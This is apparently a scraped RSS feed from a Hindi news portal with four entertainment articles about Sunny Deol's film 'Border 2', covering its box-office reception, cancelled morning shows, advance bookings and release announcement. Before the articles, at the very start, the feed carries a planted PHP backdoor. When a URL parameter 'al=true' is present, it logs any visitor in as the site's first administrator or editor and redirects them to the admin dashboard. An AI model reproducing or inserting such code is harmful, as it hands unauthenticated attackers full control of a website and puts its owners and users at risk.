// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); ‘Border 2’ – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 30 Jan 2026 16:40:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 सनी देओल ने ‘बॉर्डर 2’ को मिली प्रतिक्रिया के लिए प्रशंसकों का आभार जताया https://pratyushaashakinayikiran.com/?p=194804 Fri, 30 Jan 2026 16:40:00 +0000 https://pratyushaashakinayikiran.com/?p=194804 मुंबई,

बॉलीवुड अभिनेता सनी देओल ने सोशल मीडिया पर एक वीडियो साझा करते हुए अपनी नयी फिल्म ‘‘बॉर्डर 2’’ को मिली प्रतिक्रिया के लिए अपने प्रशंसकों को धन्यवाद दिया। इस फिल्म ने बॉक्स ऑफिस पर पहले ही 200 करोड़ रुपये की कमायी का आंकड़ा पार कर लिया है।

अनुराग सिंह द्वारा निर्देशित यह फिल्म 1997 में आई ‘‘बॉर्डर’’ का सीक्वल है। वरुण धवन, दिलजीत दोसांझ और अहान शेट्टी अभिनीत यह फिल्म 23 जनवरी को रिलीज हुई थी।

देओल ने बृहस्पतिवार को अपने इंस्टाग्राम पर एक वीडियो अपलोड किया। उन्होंने कैप्शन में लिखा, ‘‘मेरी, आपकी, हमारी ‘बॉर्डर 2’ को इतना प्यार देने के लिए, आप सबका बहुत शुक्रिया।’’

भूषण कुमार, कृष्ण कुमार, जेपी दत्ता और निधि दत्ता द्वारा निर्मित इस फिल्म में मोना सिंह, सोनम बाजवा, अन्या सिंह और मेधा राणा भी महत्वपूर्ण भूमिकाओं में हैं।

जहां 1997 की फिल्म 1971 के भारत-पाकिस्तान युद्ध के दौरान लोंगेवाला की लड़ाई की घटनाओं पर आधारित थी, वहीं ‘बॉर्डर 2’ भी उसी युद्ध की पृष्ठभूमि पर आधारित है।

देओल अगली बार प्रीति जिंटा के साथ ‘‘लाहौर 1947’’ में नजर आएंगे। इसका निर्देशन राजकुमार संतोषी ने किया है और इसका निर्माण आमिर खान के प्रोडक्शन बैनर आमिर खान प्रोडक्शंस के तहत किया गया है।

 

]]>
बॉर्डर 2′ के मॉर्निंग शोज पर पड़ा ग्रहण, कई थियेटर्स में कैंसिल हुआ फर्स्ट शो, फैंस हुए निराश https://pratyushaashakinayikiran.com/?p=194204 Fri, 23 Jan 2026 06:06:00 +0000 https://pratyushaashakinayikiran.com/?p=194204 मुंबई 

सनी देओल और वरुण धवन स्टारर फिल्म 'बॉर्डर 2' 2026 की मचअवेटेड फिल्मों में से एक है. जिससे बॉक्स ऑफिस पर नए रिकॉर्ड बनने की उम्मीद है. हालांकि, रिलीज से पहले ही फिल्म मुश्किल में पड़ गई है.

रिपोर्ट के मुताबिक, टेक्निकल दिक्कतों की वजह से कई जगह सुबह के शो कैंसिल कर दिए गए हैं. सुबह 8 बजे, 9 बजे और 10 बजे के शो पर अनिश्चितता बनी हुई है. जानकारी है कि कई जगहों पर शो कैंसिल हो सकते हैं क्योंकि कंटेंट तैयार नहीं है.

मुंबई में शो हुए कैंसिल
इंडिया टुडे की रिपोर्ट के मुताबिक, मैक्सस बोरीवली में 'बॉर्डर 2' का पहले दिन का पहला शो कैंसिल हो गया है क्योंकि प्रिंट्स देर से आए. रिपोर्ट्स के मुताबिक, ज्यादातर थिएटर ने अपने मॉर्निंग शो कैंसिल कर दिए हैं. इस वजह से फैंस निराश दिखा रहे हैं क्योंकि वे पहला शो देखने के लिए सुबह जल्दी आए थे. थिएटर ने बताया है कि वे फिल्म डाउनलोड होते ही शो रीशेड्यूल करेंगे और उन्हें सीटें देंगे.

वहीं मीडिया रिपोर्ट्स के मुताबिक फिल्म इन्फॉर्मेशन ने बताया कि फिल्म का फाइनल कंटेंट गुरुवार देर रात तक तैयार नहीं था. UFO Moviez जैसे डिलीवरी प्लेटफॉर्म ने सिनेमाघरों को बताया कि कंटेंट उम्मीद से ज्यादा देर से डाउनलोड और तैयार होगा. 

सनी देओल करेंगे करियर की बेस्ट ओपनिंग! 

सनी देओल की फिल्म ‘बॉर्डर 2’ का पहला पोस्टर आने के साथ ही लोगों में 30 साल पुरानी फिल्म ‘बॉर्डर’ का नॉस्टैल्जिया उमड़ने लगा था. टीजर और ट्रेलर आने के बाद तो माहौल और भी तगड़ा हो गया. सनी का वही धमाकेदार फौजी अंदाज, धुआंधार डायलॉगबाजी और देश के रक्षकों की कहानी देखने के लिए जनता मूड बनाने लगी थी. लेकिन पिछले कुछ वक्त से सीक्वल्स के लिए जनता कुछ खास एक्साइटेड नहीं नजर आती. इसलिए ये रिस्क भी था कि शुक्रवार को जब ‘बॉर्डर 2’ थिएटर्स में पहुंचेगी तो बॉक्स ऑफिस पर उस नॉस्टैल्जिया का असर दिखेगा या नहीं. लेकिन जनता ने ‘बॉर्डर 2’ के पक्ष में फैसला दे दिया है.

‘बॉर्डर 2’ की तगड़ी एडवांस बुकिंग
ट्रेलर आने के बाद जब ‘बॉर्डर 2’ की बुकिंग खुली तो शुरुआत में जनता का रिस्पॉन्स औसत ही था, लेकिन रिलीज का दिन करीब आते-आते बुकिंग की रफ्तार बढ़ती चली गई. गुरुवार को कई जगह शोज तेजी से भरते नजर आने लगे और मीडियम कैपेसिटी वाले कई थिएटर्स भर भी गए.

सैकनिल्क के अनुसार, ‘बॉर्डर 2’ के लिए करीब 4 लाख टिकट एडवांस में बुक हो चुके हैं. इस बुकिंग से फिल्म ने करीब 12.5 करोड़ रुपये का एडवांस ग्रॉस कलेक्शन कर डाला है. ये आंकड़ा 2025 की सबसे बड़ी हिंदी फिल्म ‘धुरंधर’ से भी बेहतर है. रिलीज से पहले रणवीर सिंह की ‘धुरंधर’ के लिए ढाई लाख से थोड़े ज्यादा टिकट एडवांस में बुक हुए थे. इस बुकिंग से ‘धुरंधर’ का एडवांस बुकिंग ग्रॉस 10 करोड़ से थोड़ा कम था. यानी एडवांस बुकिंग के मामले में ‘बॉर्डर 2’ सिर्फ ‘धुरंधर’ से बेहतर नहीं है, बल्कि काफी आगे भी है.

सनी को मिलेगी करियर की सबसे बड़ी ओपनिंग
‘धुरंधर’ को पहले दिन बॉक्स ऑफिस पर करीब 29 करोड़ रुपये की ओपनिंग मिली थी. इसका एडवांस जरूर दमदार था, लेकिन फिल्म के लिए क्रेज बनने में एक दिन का समय लगा था. पहले दिन जनता से शानदार वर्ड ऑफ माउथ मिलने के बाद ‘धुरंधर’ ने आगे कमाल करना शुरू किया था.

‘बॉर्डर 2’ के लिए नॉस्टैल्जिया सबसे बड़ा फैक्टर है. ऊपर से सनी देओल का मास अवतार दर्शकों को थिएटर्स तक खींचेगा. रिलीज की सुबह का माहौल देखें तो ‘बॉर्डर 2’ के लिए जनता ‘धुरंधर’ से ज्यादा एक्साइटेड है. अनुमान कहता है कि ‘बॉर्डर 2’ को पहले दिन कम से कम 36-37 करोड़ की ओपनिंग मिलना लगभग तय है.

‘बॉर्डर 2’ वैसे तो रिव्यू-प्रूफ फिल्म है और क्रिटिक्स की आलोचनाओं का इस पर कोई फर्क नहीं पड़ने वाला. लेकिन अगर रिव्यूज पॉजिटिव हुए और जनता का वर्ड ऑफ माउथ दमदार बना, तो ‘बॉर्डर 2’ पहले दिन 40 करोड़ का आंकड़ा भी पार जा सकती है. सनी देओल के करियर में अभी तक सबसे बड़ी ओपनिंग ‘गदर 2’ को मिली है.

उनकी शानदार कमबैक स्टोरी लिखने वाली ‘गदर 2’ ने पहले दिन 40 करोड़ रुपये की ओपनिंग की थी. इस फिल्म ने सनी देओल को बॉक्स ऑफिस पर फिर से खड़ा किया था. अब अनुमान लगाया जा रहा है कि ‘बॉर्डर 2’ से बॉक्स ऑफिस पर सनी देओल का भौकाल और भी तगड़ा होने वाला है.

इसके अलावा एक सीनियर ट्रेड पर्सन ने नाम न बताने की शर्त पर HT को बताया था, 'कंटेंट आधी रात तक मिलने की उम्मीद है… कंटेंट की स्थिति को देखते हुए, मॉर्निंग शो बहुत मुश्किल लग रहे हैं.' रिपोर्ट के अनुसार, UFO Moviez के एक WhatsApp मैसेज में कहा गया था कि डाउनलोड सुबह 6.30 बजे शुरू होगा. फिल्म के 192 मिनट के रनटाइम को देखते हुए, फिल्म को स्क्रीनिंग के लिए तैयार होने में 3-4 घंटे लग सकते हैं. ये ही वजह है कि भारत के कई हिस्सों में सुबह 8 बजे या 9 बजे के शो होने की संभावना कम है.

बॉर्डर 2 के बारे में
अनुराग सिंह के डायरेक्शन में बनी फिल्म 'बॉर्डर 2' जेपी दत्ता की 1997 की आइकॉनिक ब्लॉकबस्टर बॉर्डर का सीक्वल है. इस फिल्म में सनी देओल के साथ वरुण धवन, दिलजीत दोसांझ और अहान शेट्टी जैसे नई पीढ़ी के सितारे भी हैं. यह फिल्म गणतंत्र दिवस वीकेंड से पहले आज 23 जनवरी को रिलीज हुई है. 

]]>
‘बॉर्डर 2’ की धमाकेदार एडवांस बुकिंग, 24 घंटे में करोड़ों की कमाई; ‘जाट’, ‘गदर 2’ और ‘धुरंधर’ भी पीछे https://pratyushaashakinayikiran.com/?p=193980 Tue, 20 Jan 2026 11:50:00 +0000 https://pratyushaashakinayikiran.com/?p=193980 मुंबई

सनी देओल की फिल्म 'बॉर्डर 2' बॉक्स ऑफिस पर धमाल मचाने वाली है। यह युद्ध वाली ड्रामा फिल्म इस वीकेंड में बहुत अच्छी शुरुआत कर सकती है। 'बॉर्डर 2' की रिलीज से पहले जानिए इसका एडवांस बुकिंग कलेक्शन।

कब शुरू हुई 'बॉर्डर 2' की एडवांस बुकिंग?
फिल्म 'बॉर्डर 2' की एडवांस बुकिंग सोमवार से शुरू हुई। सिर्फ 24 घंटे में ही फिल्म को बहुत अच्छा रिस्पॉन्स मिला है। Sacnilk के अनुसार, पहले दिन की बुकिंग में फिल्म ने 2.5 करोड़ रुपये से ज्यादा का कलेक्शन कर लिया है। देशभर में 11,000 से ज्यादा शो में 73,000 टिकट बिक चुके हैं। BookMyShow पर हर घंटे 2,000 टिकट बिक रहे हैं और यह रफ्तार बढ़ती जा रही है।

बाकी फिल्मों से 'बॉर्डर 2' की तुलना?

    सनी देओल की पिछली फिल्म 'जाट' की पूरी एडवांस बुकिंग 2.4 करोड़ थी, लेकिन 'बॉर्डर 2' ने इसे पार कर लिया है।
    रणवीर सिंह की 'धुरंधर' ने पहले दिन सिर्फ 1 करोड़ की एडवांस बुकिंग की थी।
    सनी की पिछली हिट फिल्म 'गदर 2' ने 2.2 करोड़ की एडवांस बुकिंग की थी। 'बॉर्डर 2' इससे भी आगे निकल चूकी है।

    अब बात करें बॉक्स ऑफिस कलेक्शन की तो 'धुरंधर' ने पहले दिन 28 करोड़ कमाए थे और 'गदर 2' ने 40 करोड़, लेकिन फिलहाल एडवांस बुकिंग में आगे होना 'बॉर्डर 2' के लिए बहुत अच्छा संकेत है।

'बॉर्डर 2' के बारे में सबकुछ
'बॉर्डर 2' 1997 की सुपरहिट फिल्म 'बॉर्डर' की दूसरी कड़ी है। इसे अनुराग सिंह ने डायरेक्ट किया है। फिल्म में सनी देओल, वरुण धवन, दिलजीत दोसांझ और अहान शेट्टी ने मुख्य भूमिका निभाई है। इस फिल्म का निर्माण भूषण कुमार, कृष्ण कुमार, जेपी दत्ता और निधि दत्ता ने मिलकर किया है। 'बॉर्डर 2' 23 जनवरी 2026 को सिनेमाघरों में रिलीज होगी।

]]>
27 साल बाद ‘बॉर्डर’ के सीक्वल की घोषणा करने के बाद, अब गणतंत्र दिवस 2026 के मौके पर प्रदर्शित होगी सनी देओल की बॉर्डर 2 https://pratyushaashakinayikiran.com/?p=41878 Sat, 15 Jun 2024 21:55:00 +0000 https://pratyushaashakinayikiran.com/?p=41878 मुंबई
27 साल बाद 'बॉर्डर' के सीक्वल की घोषणा करने के बाद, 'बॉर्डर 2' के निर्माताओं ने अब फिल्म की रिलीज की तारीख की घोषणा की है। सनी देओल अभिनीत यह फिल्म डेढ़ साल बाद 23 जनवरी, 2026 को रिलीज होगी। 13 जून, 2024 को, जो 'बॉर्डर' के 27 साल पूरे होने पर फिल्म के निर्माताओं ने सीक्वल की घोषणा की। फिल्म की रिलीज की तारीख की घोषणा करते हुए एक बयान पढ़ा जा सकता है, "'बॉर्डर 2' की आधिकारिक पुष्टि करने के बाद, निर्माताओं ने अब 'बॉर्डर 2' की रिलीज की तारीख 23 जनवरी, 2026 घोषित की है। उत्साह, पुरानी यादों और एक महाकाव्य सिनेमाई अनुभव से भरे सप्ताहांत का वादा करने के लिए अपने कैलेंडर को चिह्नित करें।" वीडियो में सनी कहते हैं, "27 साल पहले एक फौजी ने वादा किया था कि वो वापस आएगा। उसी वादे को पूरा करने, हिंदुस्तान की मिट्टी को अपना सलाम कहने, आ रहा है।"

घोषणा वीडियो में 'बॉर्डर 2' को "भारत की सबसे बड़ी युद्ध फिल्म" बताया गया है। बैकग्राउंड में रूपकुमार राठौड़ और सोनू निगम का चार्टबस्टर गाना 'संदेशे आते हैं' बज रहा है। अनुराग सिंह द्वारा निर्देशित इस फिल्म के निर्माता जेपी दत्ता, निधि दत्ता और भूषण कुमार हैं। इससे पहले वे 'दिल बोले हड़िप्पा', 'जट्ट एंड जूलियट', 'पंजाब 1984' और 'केसरी' जैसी फिल्मों का निर्देशन कर चुके हैं।

हाल ही में, 'बॉर्डर 2' की टीम के एक करीबी सूत्र ने साझा किया कि फिल्म की टीम अक्टूबर 2024 से शूटिंग शुरू करेगी, "बॉर्डर 2' के पीछे की टीम हर चीज की तैयारी के लिए अथक परिश्रम कर रही है और इसे बनाने में काफी समय लगा है क्योंकि वे पहली फिल्म के महत्व के साथ न्याय करना चाहते थे। अब, चूंकि तैयारियां लगभग पूरी हो चुकी हैं, इसलिए टीम शूटिंग शुरू करेगी। अभी की स्थिति के अनुसार, टीम अक्टूबर में शूटिंग शुरू करेगी।"

आयुष्मान खुराना को कथित तौर पर 'बॉर्डर 2' में एक महत्वपूर्ण भूमिका के लिए चुना गया है। निर्माताओं ने अभी तक बाकी कलाकारों की घोषणा नहीं की है।

]]>